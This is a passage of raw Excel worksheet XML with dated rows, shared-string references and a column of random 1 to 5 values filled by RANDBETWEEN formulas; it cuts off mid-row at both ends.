        <v>71</v>
      </c>
      <c r="E23875" t="s">
        <v>21612</v>
      </c>
      <c r="F23875">
        <f t="shared" ca="1" si="373"/>
        <v>4</v>
      </c>
    </row>
    <row r="23876" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23876" s="1">
        <v>43005.374675925923</v>
      </c>
      <c r="C23876" t="s">
        <v>48</v>
      </c>
      <c r="E23876" t="s">
        <v>21613</v>
      </c>
      <c r="F23876">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23877" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23877" s="1">
        <v>43005.352835648147</v>
      </c>
      <c r="C23877" t="s">
        <v>71</v>
      </c>
      <c r="E23877" t="s">
        <v>21614</v>
      </c>
      <c r="F23877">
        <f t="shared" ca="1" si="373"/>
        <v>2</v>
      </c>
    </row>
    <row r="23878" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23878" s="1">
        <v>43005.335821759261</v>
      </c>
      <c r="C23878" t="s">
        <v>10</v>
      </c>
      <c r="E23878" t="s">
        <v>21615</v>
      </c>
      <c r="F23878">
        <f t="shared" ca="1" si="373"/>
        <v>2</v>
      </c>
    </row>
    <row r="23879" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23879" s="1">
        <v>43005.30196759259</v>
      </c>
      <c r="C23879" t="s">
        <v>178</v>
      </c>
      <c r="E23879" t="s">
        <v>21616</v>
      </c>
      <c r="F23879">
        <f t="shared" ca="1" si="373"/>
        <v>1</v>
      </c>
    </row>
    <row r="23880" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23880" s="1">
        <v>43005.258796296293</v>
      </c>
      <c r="C23880" t="s">
        <v>10</v>
      </c>
      <c r="D23880" t="s">
        <v>52</v>
      </c>
      <c r="E23880" s="2" t="s">
        <v>21617</v>
      </c>
      <c r="F23880">
        <f t="shared" ca="1" si="373"/>
        <v>5</v>
      </c>
    </row>
    <row r="23881" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23881" s="1">
        <v>43005.254629629628</v>
      </c>
      <c r="C23881" t="s">
        <v>178</v>
      </c>
      <c r="E23881" t="s">
        <v>21618</v>
      </c>
      <c r="F23881">
        <f t="shared" ca="1" si="373"/>
        <v>5</v>
      </c>
    </row>
    <row r="23882" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23882" s="1">
        <v>43005.249895833331</v>
      </c>
      <c r="C23882" t="s">
        <v>65</v>
      </c>
      <c r="E23882" t="s">
        <v>21619</v>
      </c>
      <c r="F23882">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23883" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23883" s="1">
        <v>43005.206597222219</v>
      </c>
      <c r="C23883" t="s">
        <v>48</v>
      </c>
      <c r="E23883" s="2" t="s">
        <v>21620</v>
      </c>
      <c r="F23883">
        <f t="shared" ca="1" si="373"/>
        <v>1</v>
      </c>
    </row>
    <row r="23884" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A23884" s="1">
        <v>43005.185960648145</v>
      </c>
      <c r="C23884" t="s">
        <v>124</v>
      </c>
      <c r="E23884" s="2" t="s">
        <v>21621</v>
      </c>
      <c r="F23884">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23885" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23885" s="1">
        <v>43005.160497685189</v>
      </c>
      <c r="C23885" t="s">
        <v>197</v>
      </c>
      <c r="E23885" t="s">
        <v>21622</v>
      </c>
      <c r="F23885">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23886" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23886" s="1">
        <v>43005.14880787037</v>
      </c>
      <c r="C23886" t="s">
        <v>50</v>
      </c>
      <c r="E23886" t="s">
        <v>21623</v>
      </c>
      <c r="F23886">
        <f t="shared" ca="1" si="373"/>
        <v>1</v>
      </c>
    </row>
    <row r="23887" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23887" s="1">
        <v>43005.121203703704</v>
      </c>
      <c r="C23887" t="s">
        <v>134</v>
      </c>
      <c r="E23887" s="2" t="s">
        <v>21624</v>
      </c>
      <c r="F23887">
        <f t="shared" ca="1" si="373"/>
        <v>4</v>
      </c>
    </row>
    <row r="23888" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23888" s="1">
        <v>43005.108495370368</v>
      </c>
      <c r="C23888" t="s">
        <v>144</v>
      </c>
      <c r="E23888" t="s">
        <v>21625</v>
      </c>
      <c r="F23888">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23889" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23889" s="1">
        <v>43005.085486111115</v>
      </c>
      <c r="C23889" t="s">
        <v>10</v>
      </c>
      <c r="D23889" t="s">
        <v>89</v>
      </c>
      <c r="E23889" t="s">
        <v>21626</v>
      </c>
      <c r="F23889">
        <f t="shared" ca="1" si="373"/>
        <v>2</v>
      </c>
    </row>
    <row r="23890" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23890" s="1">
        <v>43005.053877314815</v>
      </c>
      <c r="C23890" t="s">
        <v>48</v>
      </c>
      <c r="E23890">
        <v>7423660288</v>
      </c>
      <c r="F23890">
        <f t="shared" ca="1" si="373"/>
        <v>5</v>
      </c>
    </row>
    <row r="23891" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23891" s="1">
        <v>43005.009016203701</v>
      </c>
      <c r="C23891" t="s">
        <v>845</v>
      </c>
      <c r="E23891" s="2" t="s">
        <v>21627</v>
      </c>
      <c r="F23891">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23892" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23892" s="1">
        <v>43004.946122685185</v>
      </c>
      <c r="C23892" t="s">
        <v>565</v>
      </c>
      <c r="E23892" t="s">
        <v>21628</v>
      </c>
      <c r="F23892">
        <f t="shared" ca="1" si="373"/>
        <v>1</v>
      </c>
    </row>
    <row r="23893" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23893" s="1">
        <v>43004.937476851854</v>
      </c>
      <c r="C23893" t="s">
        <v>253</v>
      </c>
      <c r="E23893" t="s">
        <v>21629</v>
      </c>
      <c r="F23893">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23894" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23894" s="1">
        <v>43004.784560185188</v>
      </c>
      <c r="C23894" t="s">
        <v>6</v>
      </c>
      <c r="D23894" t="s">
        <v>25</v>
      </c>
      <c r="E23894" t="s">
        <v>21630</v>
      </c>
      <c r="F23894">
        <f t="shared" ca="1" si="373"/>
        <v>2</v>
      </c>
    </row>
    <row r="23895" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23895" s="1">
        <v>43004.763912037037</v>
      </c>
      <c r="C23895" t="s">
        <v>10</v>
      </c>
      <c r="D23895" t="s">
        <v>6</v>
      </c>
      <c r="E23895" t="s">
        <v>21631</v>
      </c>
      <c r="F23895">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23896" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23896" s="1">
        <v>43004.742245370369</v>
      </c>
      <c r="C23896" t="s">
        <v>10</v>
      </c>
      <c r="D23896" t="s">
        <v>86</v>
      </c>
      <c r="E23896" t="s">
        <v>21632</v>
      </c>
      <c r="F23896">
        <f t="shared" ca="1" si="373"/>
        <v>4</v>
      </c>
    </row>
    <row r="23897" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23897" s="1">
        <v>43004.736620370371</v>
      </c>
      <c r="C23897" t="s">
        <v>10</v>
      </c>
      <c r="D23897" t="s">
        <v>39</v>
      </c>
      <c r="E23897" t="s">
        <v>21633</v>
      </c>
      <c r="F23897">
        <f t="shared" ca="1" si="373"/>
        <v>2</v>
      </c>
    </row>
    <row r="23898" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23898" s="1">
        <v>43004.696643518517</v>
      </c>
      <c r="C23898" t="s">
        <v>10</v>
      </c>
      <c r="D23898" t="s">
        <v>39</v>
      </c>
      <c r="E23898" s="2" t="s">
        <v>21634</v>
      </c>
      <c r="F23898">
        <f t="shared" ca="1" si="373"/>
        <v>1</v>
      </c>
    </row>
    <row r="23899" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23899" s="1">
        <v>43004.679884259262</v>
      </c>
      <c r="C23899" t="s">
        <v>10</v>
      </c>
      <c r="D23899" t="s">
        <v>36</v>
      </c>
      <c r="E23899" t="s">
        <v>21635</v>
      </c>
      <c r="F23899">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23900" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23900" s="1">
        <v>43004.668136574073</v>
      </c>
      <c r="C23900" t="s">
        <v>10</v>
      </c>
      <c r="D23900" t="s">
        <v>251</v>
      </c>
      <c r="E23900" t="s">
        <v>21636</v>
      </c>
      <c r="F23900">
        <f t="shared" ca="1" si="373"/>
        <v>1</v>
      </c>
    </row>
    <row r="23901" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23901" s="1">
        <v>43004.666365740741</v>
      </c>
      <c r="C23901" t="s">
        <v>10</v>
      </c>
      <c r="D23901" t="s">
        <v>94</v>
      </c>
      <c r="E23901" s="2" t="s">
        <v>21637</v>
      </c>
      <c r="F23901">
        <f t="shared" ca="1" si="373"/>
        <v>2</v>
      </c>
    </row>
    <row r="23902" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23902" s="1">
        <v>43004.652141203704</v>
      </c>
      <c r="C23902" t="s">
        <v>10</v>
      </c>
      <c r="D23902" t="s">
        <v>192</v>
      </c>
      <c r="E23902" t="s">
        <v>21638</v>
      </c>
      <c r="F23902">
        <f t="shared" ca="1" si="373"/>
        <v>2</v>
      </c>
    </row>
    <row r="23903" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23903" s="1">
        <v>43004.637615740743</v>
      </c>
      <c r="C23903" t="s">
        <v>10</v>
      </c>
      <c r="D23903" t="s">
        <v>89</v>
      </c>
      <c r="E23903" t="s">
        <v>21639</v>
      </c>
      <c r="F23903">
        <f t="shared" ca="1" si="373"/>
        <v>5</v>
      </c>
    </row>
    <row r="23904" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23904" s="1">
        <v>43004.614328703705</v>
      </c>
      <c r="C23904" t="s">
        <v>10</v>
      </c>
      <c r="D23904" t="s">
        <v>244</v>
      </c>
      <c r="F23904">
        <f t="shared" ca="1" si="373"/>
        <v>4</v>
      </c>
    </row>
    <row r="23905" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23905" s="1">
        <v>43004.604050925926</v>
      </c>
      <c r="C23905" t="s">
        <v>260</v>
      </c>
      <c r="E23905" s="2" t="s">
        <v>21640</v>
      </c>
      <c r="F23905">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23906" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23906" s="1">
        <v>43004.600046296298</v>
      </c>
      <c r="C23906" t="s">
        <v>10</v>
      </c>
      <c r="D23906" t="s">
        <v>381</v>
      </c>
      <c r="E23906" s="2" t="s">
        <v>21641</v>
      </c>
      <c r="F23906">
        <f t="shared" ca="1" si="373"/>
        <v>5</v>
      </c>
    </row>
    <row r="23907" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23907" s="1">
        <v>43004.558368055557</v>
      </c>
      <c r="C23907" t="s">
        <v>10</v>
      </c>
      <c r="D23907" t="s">
        <v>158</v>
      </c>
      <c r="E23907" s="2" t="s">
        <v>21642</v>
      </c>
      <c r="F23907">
        <f t="shared" ca="1" si="373"/>
        <v>4</v>
      </c>
    </row>
    <row r="23908" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23908" s="1">
        <v>43004.544814814813</v>
      </c>
      <c r="C23908" t="s">
        <v>10</v>
      </c>
      <c r="D23908" t="s">
        <v>94</v>
      </c>
      <c r="E23908" s="2" t="s">
        <v>21643</v>
      </c>
      <c r="F23908">
        <f t="shared" ca="1" si="373"/>
        <v>2</v>
      </c>
    </row>
    <row r="23909" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23909" s="1">
        <v>43004.539780092593</v>
      </c>
      <c r="C23909" t="s">
        <v>10</v>
      </c>
      <c r="D23909" t="s">
        <v>6</v>
      </c>
      <c r="E23909" t="s">
        <v>21644</v>
      </c>
      <c r="F23909">
        <f t="shared" ca="1" si="373"/>
        <v>2</v>
      </c>
    </row>
    <row r="23910" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23910" s="1">
        <v>43004.514965277776</v>
      </c>
      <c r="C23910" t="s">
        <v>6</v>
      </c>
      <c r="D23910" t="s">
        <v>25</v>
      </c>
      <c r="E23910" t="s">
        <v>21645</v>
      </c>
      <c r="F23910">
        <f t="shared" ca="1" si="373"/>
        <v>1</v>
      </c>
    </row>
    <row r="23911" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23911" s="1">
        <v>43004.503784722219</v>
      </c>
      <c r="C23911" t="s">
        <v>189</v>
      </c>
      <c r="E23911" t="s">
        <v>21646</v>
      </c>
      <c r="F23911">
        <f t="shared" ca="1" si="373"/>
        <v>2</v>
      </c>
    </row>
    <row r="23912" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23912" s="1">
        <v>43004.503518518519</v>
      </c>
      <c r="C23912" t="s">
        <v>10</v>
      </c>
      <c r="D23912" t="s">
        <v>107</v>
      </c>
      <c r="E23912" t="s">
        <v>21647</v>
      </c>
      <c r="F23912">
        <f t="shared" ca="1" si="373"/>
        <v>4</v>
      </c>
    </row>
    <row r="23913" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23913" s="1">
        <v>43004.502604166664</v>
      </c>
      <c r="C23913" t="s">
        <v>10</v>
      </c>
      <c r="D23913" t="s">
        <v>107</v>
      </c>
      <c r="E23913" t="s">
        <v>21647</v>
      </c>
      <c r="F23913">
        <f t="shared" ca="1" si="373"/>
        <v>1</v>
      </c>
    </row>
    <row r="23914" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23914" s="1">
        <v>43004.498622685183</v>
      </c>
      <c r="C23914" t="s">
        <v>6</v>
      </c>
      <c r="D23914" t="s">
        <v>25</v>
      </c>
      <c r="E23914" s="2" t="s">
        <v>21648</v>
      </c>
      <c r="F23914">
        <f t="shared" ca="1" si="373"/>
        <v>2</v>
      </c>
    </row>
    <row r="23915" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A23915" s="1">
        <v>43004.484814814816</v>
      </c>
      <c r="C23915" t="s">
        <v>43</v>
      </c>
      <c r="E23915" s="2" t="s">
        <v>21649</v>
      </c>
      <c r="F23915">
        <f t="shared" ca="1" si="373"/>
        <v>2</v>
      </c>
    </row>
    <row r="23916" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A23916" s="1">
        <v>43004.474687499998</v>
      </c>
      <c r="C23916" t="s">
        <v>430</v>
      </c>
      <c r="E23916" s="2" t="s">
        <v>21650</v>
      </c>
      <c r="F23916">
        <f t="shared" ca="1" si="373"/>
        <v>5</v>
      </c>
    </row>
    <row r="23917" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23917" s="1">
        <v>43004.459062499998</v>
      </c>
      <c r="C23917" t="s">
        <v>60</v>
      </c>
      <c r="E23917" t="s">
        <v>21651</v>
      </c>
      <c r="F23917">
        <f t="shared" ca="1" si="373"/>
        <v>5</v>
      </c>
    </row>
    <row r="23918" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23918" s="1">
        <v>43004.458668981482</v>
      </c>
      <c r="C23918" t="s">
        <v>48</v>
      </c>
      <c r="E23918" s="2" t="s">
        <v>21652</v>
      </c>
      <c r="F23918">
        <f t="shared" ca="1" si="373"/>
        <v>5</v>
      </c>
    </row>
    <row r="23919" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23919" s="1">
        <v>43004.449942129628</v>
      </c>
      <c r="C23919" t="s">
        <v>16</v>
      </c>
      <c r="E23919" t="s">
        <v>21653</v>
      </c>
      <c r="F23919">
        <f t="shared" ca="1" si="373"/>
        <v>5</v>
      </c>
    </row>
    <row r="23920" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23920" s="1">
        <v>43004.446840277778</v>
      </c>
      <c r="C23920" t="s">
        <v>41</v>
      </c>
      <c r="E23920" t="s">
        <v>21654</v>
      </c>
      <c r="F23920">
        <f t="shared" ca="1" si="373"/>
        <v>1</v>
      </c>
    </row>
    <row r="23921" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23921" s="1">
        <v>43004.442384259259</v>
      </c>
      <c r="C23921" t="s">
        <v>10</v>
      </c>
      <c r="D23921" t="s">
        <v>94</v>
      </c>
      <c r="E23921" t="s">
        <v>21655</v>
      </c>
      <c r="F23921">
        <f t="shared" ca="1" si="373"/>
        <v>1</v>
      </c>
    </row>
    <row r="23922" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23922" s="1">
        <v>43004.410891203705</v>
      </c>
      <c r="C23922" t="s">
        <v>65</v>
      </c>
      <c r="E23922" t="s">
        <v>21656</v>
      </c>
      <c r="F23922">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23923" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23923" s="1">
        <v>43004.408877314818</v>
      </c>
      <c r="C23923" t="s">
        <v>10</v>
      </c>
      <c r="D23923" t="s">
        <v>89</v>
      </c>
      <c r="E23923" t="s">
        <v>21657</v>
      </c>
      <c r="F23923">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23924" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23924" s="1">
        <v>43004.407962962963</v>
      </c>
      <c r="C23924" t="s">
        <v>48</v>
      </c>
      <c r="E23924" s="2" t="s">
        <v>21658</v>
      </c>
      <c r="F23924">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23925" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23925" s="1">
        <v>43004.400625000002</v>
      </c>
      <c r="C23925" t="s">
        <v>477</v>
      </c>
      <c r="E23925" t="s">
        <v>21659</v>
      </c>
      <c r="F23925">
        <f t="shared" ca="1" si="373"/>
        <v>2</v>
      </c>
    </row>
    <row r="23926" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23926" s="1">
        <v>43004.384247685186</v>
      </c>
      <c r="C23926" t="s">
        <v>344</v>
      </c>
      <c r="E23926" s="2" t="s">
        <v>21660</v>
      </c>
      <c r="F23926">
        <f t="shared" ca="1" si="373"/>
        <v>4</v>
      </c>
    </row>
    <row r="23927" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23927" s="1">
        <v>43004.382407407407</v>
      </c>
      <c r="C23927" t="s">
        <v>71</v>
      </c>
      <c r="E23927" s="2" t="s">
        <v>21661</v>
      </c>
      <c r="F23927">
        <f t="shared" ca="1" si="373"/>
        <v>5</v>
      </c>
    </row>
    <row r="23928" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23928" s="1">
        <v>43004.380810185183</v>
      </c>
      <c r="C23928" t="s">
        <v>10</v>
      </c>
      <c r="D23928" t="s">
        <v>112</v>
      </c>
      <c r="E23928" t="s">
        <v>21662</v>
      </c>
      <c r="F23928">
        <f t="shared" ca="1" si="373"/>
        <v>5</v>
      </c>
    </row>
    <row r="23929" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23929" s="1">
        <v>43004.356203703705</v>
      </c>
      <c r="C23929" t="s">
        <v>10</v>
      </c>
      <c r="D23929" t="s">
        <v>232</v>
      </c>
      <c r="F23929">
        <f t="shared" ca="1" si="373"/>
        <v>1</v>
      </c>
    </row>
    <row r="23930" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23930" s="1">
        <v>43004.354467592595</v>
      </c>
      <c r="C23930" t="s">
        <v>6</v>
      </c>
      <c r="D23930" t="s">
        <v>25</v>
      </c>
      <c r="E23930" s="2" t="s">
        <v>21663</v>
      </c>
      <c r="F23930">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23931" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A23931" s="1">
        <v>43004.330289351848</v>
      </c>
      <c r="C23931" t="s">
        <v>71</v>
      </c>
      <c r="E23931" s="2" t="s">
        <v>21664</v>
      </c>
      <c r="F23931">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23932" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23932" s="1">
        <v>43004.320925925924</v>
      </c>
      <c r="C23932" t="s">
        <v>71</v>
      </c>
      <c r="E23932" s="2" t="s">
        <v>21665</v>
      </c>
      <c r="F23932">
        <f t="shared" ca="1" si="373"/>
        <v>4</v>
      </c>
    </row>
    <row r="23933" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A23933" s="1">
        <v>43004.318969907406</v>
      </c>
      <c r="C23933" t="s">
        <v>71</v>
      </c>
      <c r="E23933" s="2" t="s">
        <v>21666</v>
      </c>
      <c r="F23933">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23934" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23934" s="1">
        <v>43004.314236111109</v>
      </c>
      <c r="C23934" t="s">
        <v>48</v>
      </c>
      <c r="E23934" s="2" t="s">
        <v>21667</v>
      </c>
      <c r="F23934">
        <f t="shared" ca="1" si="373"/>
        <v>4</v>
      </c>
    </row>
    <row r="23935" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23935" s="1">
        <v>43004.287280092591</v>
      </c>
      <c r="C23935" t="s">
        <v>41</v>
      </c>
      <c r="E23935" s="2" t="s">
        <v>21668</v>
      </c>
      <c r="F23935">
        <f t="shared" ca="1" si="373"/>
        <v>2</v>
      </c>
    </row>
    <row r="23936" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23936" s="1">
        <v>43004.275034722225</v>
      </c>
      <c r="C23936" t="s">
        <v>134</v>
      </c>
      <c r="E23936" s="2" t="s">
        <v>21669</v>
      </c>
      <c r="F23936">
        <f t="shared" ca="1" si="373"/>
        <v>4</v>
      </c>
    </row>
    <row r="23937" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23937" s="1">
        <v>43004.224224537036</v>
      </c>
      <c r="C23937" t="s">
        <v>197</v>
      </c>
      <c r="E23937" s="2" t="s">
        <v>21670</v>
      </c>
      <c r="F23937">
        <f t="shared" ca="1" si="373"/>
        <v>3</v>
      </c>
    </row>
    <row r="23938" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23938" s="1">
        <v>43004.146898148145</v>
      </c>
      <c r="C23938" t="s">
        <v>73</v>
      </c>
      <c r="E23938" s="2" t="s">
        <v>21671</v>
      </c>
      <c r="F23938">
        <f t="shared" ref="F23938:F24001" ca="1" si="374">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="23939" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23939" s="1">
        <v>43004.13758101852</v>
      </c>
      <c r="C23939" t="s">
        <v>139</v>
      </c>
      <c r="E23939" t="s">
        <v>21672</v>
      </c>
      <c r="F23939">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23940" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23940" s="1">
        <v>43003.921631944446</v>
      </c>
      <c r="C23940" t="s">
        <v>6</v>
      </c>
      <c r="D23940" t="s">
        <v>114</v>
      </c>
      <c r="E23940" t="s">
        <v>21673</v>
      </c>
      <c r="F23940">
        <f t="shared" ca="1" si="374"/>
        <v>5</v>
      </c>
    </row>
    <row r="23941" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23941" s="1">
        <v>43003.801122685189</v>
      </c>
      <c r="C23941" t="s">
        <v>6</v>
      </c>
      <c r="D23941" t="s">
        <v>114</v>
      </c>
      <c r="E23941" t="s">
        <v>21674</v>
      </c>
      <c r="F23941">
        <f t="shared" ca="1" si="374"/>
        <v>1</v>
      </c>
    </row>
    <row r="23942" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23942" s="1">
        <v>43003.71979166667</v>
      </c>
      <c r="C23942" t="s">
        <v>10</v>
      </c>
      <c r="D23942" t="s">
        <v>17</v>
      </c>
      <c r="E23942" t="s">
        <v>21675</v>
      </c>
      <c r="F23942">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23943" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23943" s="1">
        <v>43003.706574074073</v>
      </c>
      <c r="C23943" t="s">
        <v>10</v>
      </c>
      <c r="D23943" t="s">
        <v>36</v>
      </c>
      <c r="E23943" s="2" t="s">
        <v>21676</v>
      </c>
      <c r="F23943">
        <f t="shared" ca="1" si="374"/>
        <v>4</v>
      </c>
    </row>
    <row r="23944" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A23944" s="1">
        <v>43003.702708333331</v>
      </c>
      <c r="C23944" t="s">
        <v>45</v>
      </c>
      <c r="D23944" t="s">
        <v>23</v>
      </c>
      <c r="E23944" s="2" t="s">
        <v>21677</v>
      </c>
      <c r="F23944">
        <f t="shared" ca="1" si="374"/>
        <v>4</v>
      </c>
    </row>
    <row r="23945" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A23945" s="1">
        <v>43003.632719907408</v>
      </c>
      <c r="C23945" t="s">
        <v>6</v>
      </c>
      <c r="D23945" t="s">
        <v>25</v>
      </c>
      <c r="E23945" s="2" t="s">
        <v>21678</v>
      </c>
      <c r="F23945">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23946" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23946" s="1">
        <v>43003.619525462964</v>
      </c>
      <c r="C23946" t="s">
        <v>10</v>
      </c>
      <c r="D23946" t="s">
        <v>11</v>
      </c>
      <c r="E23946" t="s">
        <v>21679</v>
      </c>
      <c r="F23946">
        <f t="shared" ca="1" si="374"/>
        <v>4</v>
      </c>
    </row>
    <row r="23947" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23947" s="1">
        <v>43003.598946759259</v>
      </c>
      <c r="C23947" t="s">
        <v>6</v>
      </c>
      <c r="D23947" t="s">
        <v>25</v>
      </c>
      <c r="E23947" t="s">
        <v>21680</v>
      </c>
      <c r="F23947">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23948" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23948" s="1">
        <v>43003.55809027778</v>
      </c>
      <c r="C23948" t="s">
        <v>10</v>
      </c>
      <c r="D23948" t="s">
        <v>20</v>
      </c>
      <c r="E23948" t="s">
        <v>21681</v>
      </c>
      <c r="F23948">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23949" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23949" s="1">
        <v>43003.544502314813</v>
      </c>
      <c r="C23949" t="s">
        <v>10</v>
      </c>
      <c r="D23949" t="s">
        <v>178</v>
      </c>
      <c r="E23949" s="2" t="s">
        <v>21682</v>
      </c>
      <c r="F23949">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23950" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23950" s="1">
        <v>43003.518391203703</v>
      </c>
      <c r="C23950" t="s">
        <v>41</v>
      </c>
      <c r="E23950" t="s">
        <v>21683</v>
      </c>
      <c r="F23950">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23951" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23951" s="1">
        <v>43003.516111111108</v>
      </c>
      <c r="C23951" t="s">
        <v>10</v>
      </c>
      <c r="D23951" t="s">
        <v>232</v>
      </c>
      <c r="E23951" t="s">
        <v>21684</v>
      </c>
      <c r="F23951">
        <f t="shared" ca="1" si="374"/>
        <v>2</v>
      </c>
    </row>
    <row r="23952" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23952" s="1">
        <v>43003.511273148149</v>
      </c>
      <c r="C23952" t="s">
        <v>430</v>
      </c>
      <c r="E23952" s="2" t="s">
        <v>21685</v>
      </c>
      <c r="F23952">
        <f t="shared" ca="1" si="374"/>
        <v>2</v>
      </c>
    </row>
    <row r="23953" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23953" s="1">
        <v>43003.488888888889</v>
      </c>
      <c r="C23953" t="s">
        <v>10</v>
      </c>
      <c r="D23953" t="s">
        <v>89</v>
      </c>
      <c r="E23953" t="s">
        <v>21686</v>
      </c>
      <c r="F23953">
        <f t="shared" ca="1" si="374"/>
        <v>5</v>
      </c>
    </row>
    <row r="23954" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23954" s="1">
        <v>43003.485763888886</v>
      </c>
      <c r="C23954" t="s">
        <v>48</v>
      </c>
      <c r="E23954" s="2" t="s">
        <v>21687</v>
      </c>
      <c r="F23954">
        <f t="shared" ca="1" si="374"/>
        <v>1</v>
      </c>
    </row>
    <row r="23955" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23955" s="1">
        <v>43003.478310185186</v>
      </c>
